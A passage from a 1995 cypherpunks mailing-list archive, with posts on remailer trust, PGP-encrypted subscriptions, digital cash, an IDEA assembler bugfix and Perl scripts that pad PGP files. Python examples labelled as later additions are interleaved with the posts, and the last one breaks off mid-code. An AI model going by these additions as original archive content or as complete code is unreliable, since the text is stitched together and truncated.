   bicyclists out for a ride in the park. Laurie Mylroie,
   the U.S. expert on Iraq who wrote a fine best seller on
   Saddam Hussein with Judith Miller, has written another
   book, focusing on the question of an Iraqi role in the
   bombing. It deserves to be published wide and soon.


   The Emerson documentary brought protests from American
   Muslim groups. So will the new legislation. Immediately,
   non-Muslims nod sympathetically and think, well, it's
   understandable Muslims will be upset. I almost did
   myself. But why? Christians are not expected to complain
   about denunciation of Christian Fascists. Jews around the
   world led the protests of the massacre at the mosque in
   Hebron and Jews generally did not protest the President's
   freezing of funds of two extremist Jewish groups.


   The assumption that all Muslims must be angry at action
   against Muslim terrorists strengthens the killers. It
   demeans the intelligence of all Muslims. And, as for the
   hundreds of thousands of Muslim victims who died under
   Muslim state tyranny or Muslim state-supported terrorism,
   it spits on their graves.


   END





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 3 Feb 95 14:00:10 PST
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
In-Reply-To: <Pine.SUN.3.91.950203103828.3246E-100000@crl.crl.com>
Message-ID: <199502032159.QAA12943@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


From a couple of folx....

> > Actually, there is a germ of truth in this.  On older phones (don't know if 
> > this works on newer electronic phones) when the handset is 'on-hook' a 
> > switch opens and breaks the voice circuit.  This of course only works for 
> > DC circuits.  If you drive that same circuit with an AC signal . . .
> 
> There's another angle I may have mentioned before.  Many 
> electronic phones come with a ``feature'' that allows you to 
> call home, produce an electronic tone and eavesdrop on your own
> house.  When the tone is sounded, the ringing stops (or never
> starts) and the phone goes into ``off hook'' mode (i.e., the
> microphone in the mouthpiece is turned on).
> 
[ Snip! ]

A simpler solution is to keep the phone in another room used mainly for
phonecalls, or even in a small office if you don't make any sounds there
worth eavesdropping on. (The really paranoid can soundproof/tempest-proof
the room....)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 3 Feb 95 18:45:45 PST
To: cypherpunks@toad.com
Subject: Re:  re to hfinney
Message-ID: <199502040245.SAA05320@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: anonymous-remailer@shell.portal.com
> kool . could you please repost the scripts , i seem to have misplaced them.
> also , where can i get perl for dos , any idea ? tia .

Rather than re-post them, I put a copy of my message up for ftp at the
cypherpunks ftp site.  <URL:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/incoming/pgppad.scr >




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimp@wired.com (Jim Petersen)
Date: Tue Sep 07 12:49:18 1999
To: werewolf@io.org (Mark Terka)
Subject: Re: Why Doesn't Wired.....
In-Reply-To: <v4cAlOwscUg6077yn@io.org>
Message-ID: <4d08848dffcdbd0f7a5839bb1547e3d4@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <v4cAlOwscUg6077yn@io.org>, werewolf@io.org (Mark Terka) wrote:

> .....if it is sooooooo hooked in the online culture have a PGP public key
> that 'net users could use to send in their credit card numbers for
> subscriptions?


Here it is. We're just implementing it. Send us a message (send to
talk2subs@wired.com)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7

mQCOAy8EM1EAAAEEANqhOZTAwWI/99ZZ7t77VHH02n+xM4CQEk2DJe2zZhpjKP8v
EHndzBPr3dIsHOZUJABi7ztk5NiQhNVR5EBE7Tqz/7HhGFUE2ErVjAS3OQckcmvW
BrCgNXfe0G4tlX1paXFGHsoVT3UgE2IKjttwmZA1WtOH1lbgLCGi/5f257vHAA9A
AbQnV2lyZWQgQ2lyY3VsYXRpb24gPHRhbGsyc3Vic0B3aXJlZC5jb20+
=xdqc
-----END PGP PUBLIC KEY BLOCK-----

-- 
Jim Petersen                         Argue for your limitations....
jimp@wired.com                           And they are yours.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Fri, 3 Feb 95 21:09:35 PST
To: cypherpunks@toad.com
Subject: Wired Institutes PGP Usage For Subscriptions....
Message-ID: <8ajClOwscU-H077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


Got this message in my mailbox a week after I posted the query of magazine
subscriptions via encrypted cc #'s. I'll check it out tonight, as I want to
order a subscription for a friend.
===========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Fri, 3 Feb 95 21:59:13 PST
To: wcs@anchor.ho.att.com
Subject: Re:  commercial authecation
Message-ID: <199502040558.AA15052@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Keith Henson asked how to find the digital-time-stamp folks,
> Surety Technologies Inc., started by Stuart Haber and Scott Stornetta 
> as a spinoff of Bellcore.
> 
> They're now actively in business - there was an article in one of the 
> trade rags that you can get their signature kit for PCs for
> something like $50 with tokens for 50 notarizations.
> Details on their web page.

This technology is very clever and bound to be extremely important.  
But does anyone else think that the price is a little high?  I mean 
the marginal cost can't be more than a few seconds of CPU time for 
each time stamp...

This price tag will temporarily put the time stamp technology out of 
ubiquitous use, where every piece of e-mail, homework paper, Usenet 
post, etc., is automaticly time stamped in a cryptographically secure 
way so that authorship can be asserted and proved.  I think the 
need for proof of authorship is going to become increasingly important 
in an increasingly online world, where copying is so effortless, and 
reputations are based on digital identities.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzMXKDl0sXKgdnV5AQFA+gP/XcrjAncBMVqocpXYfAaBR7RJ2PDR4ZF/
TEgCPcPM7we4eoR5w++7V+jsBhtNRSng5OUCeKQWSCU8BDnkUXuQNpQ8+fNKciMS
RQWn1PBx4carczVOJoNyR1U8Rxu9tIH0Drh/NIZJ4324azpMOd8ysVFkJ4QODCPu
07Bf7pZ36c0=
=tAcu
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 3 Feb 95 09:56:58 PST
To: cypherpunks@toad.com
Subject: Compromising the first remailer
Message-ID: <gate.0gDZZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:
> >notion of not assigning trust is simply nonsense. When you send a piece
> >of mail to a remailer, encrypted or not, you are assigning complete
> >trust in that remailer to keep you anonymous and not to forward your
> >mail to the NSA immediately.
>  
> NOT TRUE.  With proper use of encryption, you are trusting your first
> remailer only to not reveal that you sent a message, and not to correlate
> that message to the one it sends out.  With rational use of garbage running
> two deep, you can even suffer this loss without significant harm.
 
Actually any remailer, with NSA-modified operating software, can correlate the
message it receives to the one it sends out, by keeping track of the message
past any decryption until it's posted out. With rational use of garbage and
chaining, all you do is stop the NSA from knowing your final destination from
the first remailer, but they _would_ know the identity of the second remailer
(assuming the first is compromised) and could try to attack the second, ad
nauseam. Of course this was always known to be the problem, to which chaining
and traffic analysis evasion are partial solutions.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 3 Feb 95 09:54:26 PST
To: cypherpunks@toad.com
Subject: Tribes, cyberspace and the communication society
Message-ID: <gate.eiDZZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


The Internet develops its own order...

Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#46, 30/January/1995: Tribes, cyberspace and the communication society

Industrialization brought with it many social changes.
Concentrating power in cities, it expanded the value of
property rights and built a complex formal legal system to
enforce them. It gave birth to the powerful police force
as the means for keeping law and order in the urban
population of gathered strangers, and, while spreading
democracy, distanced people from the process of
legislation that affected them. All this is going to
change as the information revolution engulfs the planet.
Perhaps surprisingly, the social changes to come will more
closely reflect humans as they interacted millennia ago,
rather than as they did in the more recent past.

Before industrialization, cities were much less important.
The village (in an idealized history) was the key social
unit, as the tribe was in pre-agricultural communities.
Economic power, being geographically distributed, resulted
in considerable control by people over the informal rules
that governed them and their immediate environment,
despite the absence of democracy as we now know it.
Property rights were lax, especially in tribal society;
villages placed great importance on common land. There was
correspondingly little emphasis on a police force or
formal law. Order was maintained primarily through systems
of social punishment - reputation and taboo.

As cities formed, the value of owned property increased,
as there was little sense of community or common benefit
among strangers. Crime increased, property rights became
important to enforce, and taboo was no longer an effective
preserver of order primarily because unlike villages, the
city is not what I call a communication society. People
don't depend on each other in cities as much as in
villages, nor does the threat of ostracization work, as
social interaction is a far greater component of rural
than urban life. Urban society needed, and developed,
modern forms of centralized law enforcement.

As mainstream media and the general public discover the
relative anarchy of the Internet, they take fright at its
apparent disorder and suggest the need for government if
cyberspace is to have a future - people fear freedom. At
least until they experience it - after all, the Net has
been around long before it became front-page news, and has
evolved its own, distributed, law. Based on principles of
total freedom of expression and a strong dislike of
irrelevant content outside clearly defined zones,
infractions are met sometimes by the guerrilla action of
spontaneous protest, sometimes by ostracization.

This works because cyberspace is also a communication
society. While McLuhan's Global Village has become
extremely cliched, in this aspect cyberspace does resemble
a village. People on the Net may not be dependent on each
other for food and clothing, but they are for almost
anything else concerned with a cyber life. Cyberspace is
full of vibrant communities that do little else but talk,
and with social interaction at a higher level than at any
time in history, it is well suited to a system of social
punishment such as taboo; indeed, this may become the only
practical form of wired justice, and could be very
effective - in cyberspace, if nobody talks to you, you're
dead.

The similarity to pre-industrial communities does not end
with modes of governance, but extends to basic issues of
economics. Property rights in the infosphere are
contentious; they keep getting more impractical to
enforce, and will play a diminished role in a post-
industrial world as technology and people work around
attempts at formal legislation. Without realizing it, the
denizens of the Net have already created a vast 'cooking-
pot' market in software, news and information, based on
the very tribal notion of shared property and benefit.
That government and industry will work with such
disorganized economies is extremely unlikely, but they are
so inherent to the communication society that cyberspace
is, that they will survive, though perhaps occasionally
going underground.

Technology and society go hand in hand, but sometimes
history repeats itself, if not without variation. Though
the realm of information forms but part of our lives, that
part will increase, and affect the rest. If we are a
communication society while in the ocean of information,
what might we be outside?

Rishab Aiyer Ghosh is a freelance technology consultant
and writer. You can reach him through voice mail (+91 11
3760335) or e-mail (rishab@dxm.ernet.in).
--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@dxm.ernet.in)
--==================================================================--


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Fri, 3 Feb 95 22:11:13 PST
To: tjb@acpub.duke.edu
Subject: IMPORTANT: BUG IN 68K IDEA ASSEMBLER DISTRIBUTED IN SECURE EDIT
Message-ID: <v01510102ab58c9039fd6@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


IMPORTANT NOTE:

If you are going to use the IDEA 68k assembler distributed with Secure Edit
b0.5, please take note of the following bug:

You have to change

@Mulzero3:
        neg.w   d7 <---
        addq.w  #1,d5
        sub.w   -2(a1),d5
        bra.s   @Muldone3

to:

@Mulzero3:
        neg.w   d5 <---
        addq.w  #1,d5
        sub.w   -2(a1),d5
        bra.s   @Muldone3


I have not yet received any reports of data being fouled up by this, and
before tonight personally had encrypted and decrypted megabytes without
error, but note that I HAVE FOUND EXAMPLES OF IT FOULING UP A BLOCK OF
DATA. IT IS DANGEROUS TO USE THIS CODE IN ITS PRESENT FORM. Please make
note of this if you are going to use this 68k code.

Currently, I do not believe this code is being used anywhere except Secure
Edit b0.5, although it was certainly about to be used. I will immediately
upload a corrected version of Secure Edit and source.

Sorry about the screw up.

Tom



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
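
A check of the two @Mulzero3 variants quoted above against the reference IDEA multiplication, as an added Python example that is not code from Secure Edit. It assumes that d5 holds the 16-bit data word, that -2(a1) is the subkey word, and that the branch is reached whenever either operand is zero; the function names are this example's own.

```python
# Added illustration (not code from Secure Edit). Register roles are assumptions:
# d5 holds the 16-bit data word and -2(a1) is the subkey word just consumed.

MOD = 0x10001  # IDEA multiplies modulo 2**16 + 1, with the word 0 standing for 2**16


def idea_mul(a, b):
    """Reference IDEA multiplication on 16-bit words."""
    a = a or 0x10000
    b = b or 0x10000
    return (a * b % MOD) & 0xFFFF


def mulzero_corrected(d5, key):
    """neg.w d5 / addq.w #1,d5 / sub.w -2(a1),d5  ->  1 - d5 - key (mod 2**16)."""
    d5 = (-d5) & 0xFFFF
    d5 = (d5 + 1) & 0xFFFF
    return (d5 - key) & 0xFFFF


def mulzero_as_shipped(d5, key):
    """neg.w d7 / addq.w #1,d5 / sub.w -2(a1),d5  ->  d5 + 1 - key (mod 2**16).

    Only the value left in d5 is modelled; the side effect on d7 is not,
    because the post does not show what d7 holds at this point.
    """
    d5 = (d5 + 1) & 0xFFFF
    return (d5 - key) & 0xFFFF


def zero_operand_pairs():
    """All (data, key) pairs with at least one zero word: 2 * 65536 - 1 of them."""
    for v in range(0x10000):
        yield 0, v
        if v:
            yield v, 0


def mismatches(branch):
    """Pairs on which `branch` disagrees with the reference multiplication."""
    return [(d, k) for d, k in zero_operand_pairs() if branch(d, k) != idea_mul(d, k)]


if __name__ == "__main__":
    bad = mismatches(mulzero_as_shipped)
    print("corrected branch mismatches:", len(mismatches(mulzero_corrected)))
    print("shipped branch mismatches:  ", len(bad))
    print("all with a zero subkey word:", all(k == 0 for _, k in bad))
```

Under these assumptions the shipped branch leaves the right value in d5 whenever the data word is zero and a wrong one for nearly every nonzero data word that meets a zero subkey word, which is the kind of input a regression test for this routine has to supply deliberately.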






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Sat, 4 Feb 95 00:01:00 PST
To: tjb@acpub.duke.edu
Subject: FIXED SEC. EDIT, SEC. EDIT SOURCE, UPGRADE PATCH
Message-ID: <v0151010aab58e5d06317@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


I have uploaded a fixed version of both secure edit and source code to
ripem.msu.edu in the directory pub/crypt/mac.

I have also uploaded a 35k patch that will update your b0.5 to b0.6.

There are also some other minor bugfixes rolled into this b0.6 update.

Again, sincere apologies for the bug (it was my fault), and I earnestly
hope no data was compromised by it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sat, 4 Feb 95 02:22:46 PST
To: cypherpunks@toad.com
Subject: <none specified>
Message-ID: <199502041019.FAA17058@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I wonder if 'Net-cash' is any good?  Try sending e-mail to
netbank-info@agents.com
with the words netbank-intro on the first line of body.

It says:

        The NetBank ...is based on "payment coupons" that may be traded
        via electronic mail ... NetCash is easily obtained by using the
        NetBank's "Check Cashing by FAX" service.  Customers may
        purchase NetCash by writing a personal check and faxing it to
        the NetCash Distribution Center.  Travelers on the Infobahn may
        carry NetCash and cash checks while online.

and lots more. Does not look too anonymous, however, and there is no
mention of PGP in the documents I got.  But do check it out.

When you get the info, they give you 5 cents worth of NetCash, BTW.
They also have other stuff:

        For information on related topics, please send e-mail to
        "netbank-info@agents.com" with the following keyword(s) in the
        message:

    Keyword                         Topic

  netbank-faq         Answers to frequently asked questions
  buying-netcash      How to buy NetCash from the NetBank
  netbank-merchant    Opening a NetBank Merchant account
  shareware-info      Using the NetBank to collect shareware fees
  boardwatch-story    Reprint of NetCash story from Boardwatch Magazine
  story-update        Enhancements since the Boardwatch story was published

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzNURyoZzwIn1bdtAQFwJwF+KeI9ErF2N04Y1+XwX4B6teBDlIudSuip
uNhn0k80uoru/vIWb//WMiMCBFHT+Bww
=39YD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Sat, 4 Feb 95 03:01:39 PST
To: werewolf@io.org (Mark Terka)
Subject: Re: Wired Institutes PGP Usage For Subscriptions....
In-Reply-To: <8ajClOwscU-H077yn@io.org>
Message-ID: <199502041101.GAA29832@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Got this message in my mailbox a week after I posted the query of magazine
> subscriptions via encrypted cc #'s. I'll check it out tonight, as I want to
> order a subscription for a friend.

[ clip ]

> In article <v4cAlOwscUg6077yn@io.org>, werewolf@io.org (Mark Terka) wrote:
> 
> > .....if it is sooooooo hooked in the online culture have a PGP public key
> > that 'net users could use to send in their credit card numbers for
> > subscriptions?
> 
> 
> Here it is. We're just implementing it. Send us a message (send to
> talk2subs@wired.com)

[ clip ]

Neato. I'm tempted to send 'em a message saying "Where's the crime?!"...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjwohler@netcom.com (Marc Wohler)
Date: Sat, 4 Feb 95 06:26:35 PST
To: cypherpunks@toad.com (Cypher Punks)
Subject: NYC CPUNKS MEET NEXT SAT
Message-ID: <199502041425.GAA29475@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Attn.: New York City area Cypherpunks

NYC C'punks meeting:

Sat Feb 11, 3:00 P.M., at the home of Linn & Barbara  Stanton
315 West 106 Street  Apt 2A 
(Between West End Ave & Riverside Drive)
212-316-1958.

Once again the gracious Stantons invite local area Cpunks to
their lovely home which is smoke free and feline friendly.

The agenda is still open and suggestions can be made to
mjwohler@netcom.com
or phone Marc Wohler @ 212-362-0690. Let me know if you plan to
attend.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@panix.com>
Date: Sat, 4 Feb 95 05:59:04 PST
To: extropians@panix.com (e)
Subject: Forward: Teleco/Cabe REg. & Free speech
Message-ID: <199502041358.AA09885@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


TELECOM REFORM, REPUBLICAN-STYLE Sen. Larry Pressler (R-SD) has
proposed a telecommunications reform plan that would drop all cable TV
rate regulations; allow local phone and cable competition and
cross-ownership in one year; ease foreign ownership restrictions; and
allow local phone companies to compete in long distance in three
years. A formal counter proposal is expected from the Democrats
February 14, and it's expected that there will be objections to most
of the provisions outlined in Pressler's bill. (Investor's Business
Daily 2/2/95 A4)

(((cut here)))

For those that don't know I have my Master's in Interactive
Telecommunications, and have long looked at cable and teleco from
several angles including freemarket and cypherpunk viewpoints.

While there is a lack of detail here, I strongly endorse anything that
lets cable and phone companies compete. They have largely the same
customer base (although telco's have a larger % of the base), but the
cable companies are in a better opportunity to offer PCS,
higher-bandwidth networking, and video on demand.

What we have to watch out for is FCC regulation. It is well accepted
that the FCC can censor commercial speech (cig. ads), and individual
speech (the 7 dirty words), in the "public" interest.

Cable and Teleco are FCC regulated. If they provide the network of
the future, as opposed to UUnet-Microsoft (for example), we might
have to be careful..

The "model" of interactivity most "thinking" people endorse is one
that is two way. The FCC does really monitor what you say on the phone
(although who knows about the NSA ;)... If you can in the brave new
Telco/Cable future send as well as receive.. and send in
broadcast-like mode... are you subject to content approval from the
FCC?

We should strongly endorse this move by Sen. Pressler as it will
get us broadband to many homes in 5 to 7 years, but we have to
remain concerned about our freedom to speak no matter if that is
one on one, or to a large group!

/hawk


-- 
Harry S. Hawk  		   habs@panix.com
Product Marketing Manager
PowerMail, Inc. 	   Producers of MailWeir(tm) & PowerServ(tm)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 4 Feb 95 10:11:09 PST
To: cypherpunks@toad.com
Subject: There is another NetCash
Message-ID: <199502041810.KAA20164@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: rah@shipwright.com (Robert Hettinga)
> At 5:19 AM 2/4/95, Anonymous wrote:
> >I wonder if 'Net-cash' is any good?
>
> Probably the best discussion of the available transaction
> processing/settlement mechanisms is by Jason Solinsky. It's called "An
> Introduction to Electronic Commerce", and though he probably hasn't updated
> it since he wrote it a few months ago, he discusses NetCash there...

People interested in NetCash should be aware of a potentially confusing
name re-use.  NetCash is also the name of a payment system designed by
people associated with the Information Sciences Institute (affiliated, I
think, with USC).  A reference is: <URL:
ftp://PROSPERO.ISI.EDU/pub/netcheque/information/netcash-cccs93.ps.Z >
 
Despite the names, neither one is cash in the cryptographic sense:
neither uses blinding.  If you didn't want the bank to be able to create
a database of every transaction you make, everything you spend and with
whom, you would need to have some anonymous connection with the bank and
exchange your netcash through that connection.  This would be cumbersome
IMO.  Some payment system is probably better than none, but I hate to see
the name "cash" expropriated by these non-cash systems.
 
Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 4 Feb 95 10:17:03 PST
To: cypherpunks@toad.com
Subject: PGP padding scripts (again)
Message-ID: <199502041816.KAA20644@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the bandwidth waste, but my anonymous correspondent was not
able to ftp these scripts.  I also got another request for the scripts.
So here again is my post with a pair of perl scripts which will insert
padding pretty much undetectably into a .pgp file.  The one limitation is
the quality of Perl's random number generator.



Here are a couple of perl scripts I wrote last year to add padding to PGP
encrypted files.  The usage would be:

perl pgppadt.pl filename bytestoadd

The output file is filename.pad.

It only works on binary ".pgp" public-key encrypted files (not ascii armored
files).  So there would be some work needed to make it a really useful tool.
It would also be better to use a strong source of random numbers.  I
think Carl Ellison recently posted some tools that could help with this.
The two files are pgppad.pl, which does the work, and pgppadt.pl, a very
simple test driver to show how to use it.  They are in a shar archive.

Hal

---------------cut here----------------
#!/bin/sh
# to extract, remove the header and type "sh filename"
if `test ! -s ./pgppad.pl`
then
echo "writing ./pgppad.pl"
cat > ./pgppad.pl << '\End\Of\Shar\'
# Perl module to allow padding and some other manipulation of PGP
# files.
#
# Include this with the statement:
# require 'pgppad.pl'
#
# 10/16/93
# Hal Finney


# Read a PGP Cipher Type Byte and the following length.
# One argument: file to read from
# Returns several things, in this order:
# CTB, with the length information removed, as a number.
# Length of following packet.
# Name of this kind of packet, made up, see list below.
# Packed CTB/length packet, suitable for writing out.
# Returns an empty string on error.
sub read_ctb {
    local($file) = @_;
    local($ctb, $length, $name, $rctb, $rlength, $lengthlength);

    if (read ($file, $rctb, 1) != 1) {		# Raw ctb
	return "";
    }
    $ctb = unpack ("C", $rctb);
    if ($ctb < 128) {
	return "";		# Must have high bit set
    }
    $lengthlength = $ctb % 4;
    $ctb -= $lengthlength;
    if ($lengthlength == 0) {
	$lengthlength = 1;
    } elsif ($lengthlength == 1) {
	$lengthlength = 2;
    } elsif ($lengthlength == 2) {
	$lengthlength = 4;
    } else {
	$lengthlength = 0;
	$length = -1;	# Unknown length
    }
    if (read ($file, $rlength, $lengthlength) != $lengthlength) {
	return "";
    }
    if ($lengthlength==1) {
	$length = unpack("C", $rlength);
    } elsif ($lengthlength==2) {
	$length = unpack("n", $rlength);
    } elsif ($lengthlength==4) {
	$length = unpack("N", $rlength);
    }
    $rctb = $rctb . $rlength;	# Raw CTB byte followed by the raw length bytes
    if ($ctb==0x84) {
	$name = "pubkey header";
    } elsif ($ctb==0x88) {
	$name = "signature";
    } elsif ($ctb==0x8c) {
	$name = "message digest";
    } elsif ($ctb==0x94) {
	$name = "secret key";
    } elsif ($ctb==0x98) {
	$name = "public key";
    } elsif ($ctb==0xa0) {
	$name = "compressed";
    } elsif ($ctb==0xa4) {
	$name = "conventional encrypted";
    } elsif ($ctb==0xa8) {
	$name = "plaintext";
    } elsif ($ctb==0xb0) {
	$name = "trust";
    } elsif ($ctb==0xb4) {
	$name = "user id";
    } elsif ($ctb==0xb8) {
	$name = "comment";
    } else {
	return "";
    }
    return ($ctb, $length, $name, $rctb);
}

# Write a CTB and length field out.
# 3 arguments: file handle, ctb value, and length in bytes.
# No return value.
# Length gets output as 1, 2, or 4 bytes, the smallest in which it
# will fit.
# If length is negative we output no length field, but an "indefinite
# length" code is added to ctb.
sub write_ctb {
    local($file, $ctb, $length) = @_;
    local($rctb);

    $ctb = $ctb - ($ctb % 4);	# Be sure 2 low bits are clear
    if ($length < 0) {
	$rctb = pack ("C", $ctb+3);		# Packed data
    } elsif ($length > 65535) {
	$rctb = pack ("C N", $ctb+2, $length);  # Packed data
    } elsif ($length > 255) {
	$rctb = pack ("C n", $ctb+1, $length);  # Packed data
    } else {
	$rctb = pack ("C C", $ctb+0, $length);  # Packed data
    }
    print $file $rctb;
}

# This entry point always outputs a 4-byte count.  Length must be > 0.
# Otherwise like write_ctb.
sub write_ctb_4 {
    local($file, $ctb, $length) = @_;
    local($rctb);

    $ctb = $ctb - ($ctb % 4);	# Be sure 2 low bits are clear
    if ($length < 0) {
	die ("write_ctb_4 called with negative length\n");
    }
    $rctb = pack ("C N", $ctb+2, $length);  # Packed data
    print $file $rctb;
}


# Pad a PGP public-key-encrypted file to the specified length.
# Arguments: input file handle; output file handle; new size.
# Returns negative value on error.  See the code for what the
# different values mean.
# Returns 0 on success.
sub pgppad {
    local($infile, $outfile, $size) = @_;
    local($ctb, $len, $name, $rctb, $insize, $buf, $data);

    # Read ctb & length of pubkey header
    ($ctb, $len, $name, $rctb) = &read_ctb($infile);
    if ($ctb == 0) {
	return -1;	# Error
    }
    if ($name ne "pubkey header") {
	return -2;	# Error
    }
    if ($len < 0) {
	return -3;	# Error
    }

    $insize = length($rctb) + $len;

    # Read packet of pubkey header
    if (read ($infile, $data, $len) != $len) {
	return -3;
    }

    # Write out pubkey header, unchanged
    &write_ctb($outfile, $ctb, $len);
    print $outfile $data;

    # Read ctb and length of conventional packet
    ($ctb, $len, $name, $rctb) = &read_ctb($infile);
    if ($ctb == 0) {
	return -4;	# Error
    }
    if ($name ne "conventional encrypted") {
	return -5;	# Error
    }

    # Calculate size of outgoing conventional packet.
    # Assume rctb won't change size; it may grow by 1 or 2 in some
    # rather rare cases, in which case we'll be a byte or two too big.
    $size -= $insize + length($rctb);
    if ($size < $len) {
	return -6;	# Error
    }

    # Output CTB with new length
    &write_ctb_4($outfile, $ctb, $size);

    # Copy remainder of input file
    while (read ($infile, $buf, 32768)) {
	print $outfile $buf;
    }

    # Note that this random number generator is probably not
    # cryptographically strong.
    srand (time|$$);
    while ($len < $size) {
	print $outfile pack ("C", int(rand(256)));
	++$len;
    }

    return 0;		# Success
}

1;	# Non-zero return for 'require'
\End\Of\Shar\
else
  echo "will not over write ./pgppad.pl"
fi
if `test ! -s ./pgppadt.pl`
then
echo "writing ./pgppadt.pl"
cat > ./pgppadt.pl << '\End\Of\Shar\'
# Test program for pgppad.pl, showing how to use it.
require 'pgppad.pl';

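open (IN, $ARGV[0]) || die ("Couldn't open $ARGV[0]\n");
open (OUT, ">$ARGV[0].pad") || die ("Couldn't create $ARGV[0].pad\n");
# PGP files are binary; keep systems with a separate text mode from
# translating bytes on the way in or out.
binmode (IN);
binmode (OUT);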

$padding = $ARGV[1];

@stat = stat(IN);
$size = $stat[7];
print "Input file $ARGV[0] has size $size bytes\n";
print "Output file $ARGV[0].pad will have size ".($size+$padding)." bytes\n";

if (($code = &pgppad (IN, OUT, $size+$padding)) < 0) {
    die ("pgppad returns code $code\n");
}

close (IN);
close (OUT);
print ("Done\n");

\End\Of\Shar\
else
  echo "will not over write ./pgppadt.pl"
fi
echo "Finished archive 1 of 1"
exit
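
The padding step from pgppad.pl, as an added Python example that is not Hal Finney's code: it rewrites the conventional-encrypted packet's length as a 4-byte field and appends padding drawn from os.urandom, since the post names Perl's random number generator as the one limitation. The names pad_pgp, PadError and sample_file and the sample bytes are this example's own; unlike the Perl version it counts the header growth, so the output is exactly the requested size, and it refuses indefinite-length packets.

```python
import os
import struct

# Old-format PGP 2.x Cipher Type Bytes, length bits cleared (values from read_ctb in the post).
CTB_PUBKEY_HEADER = 0x84
CTB_CONVENTIONAL = 0xA4
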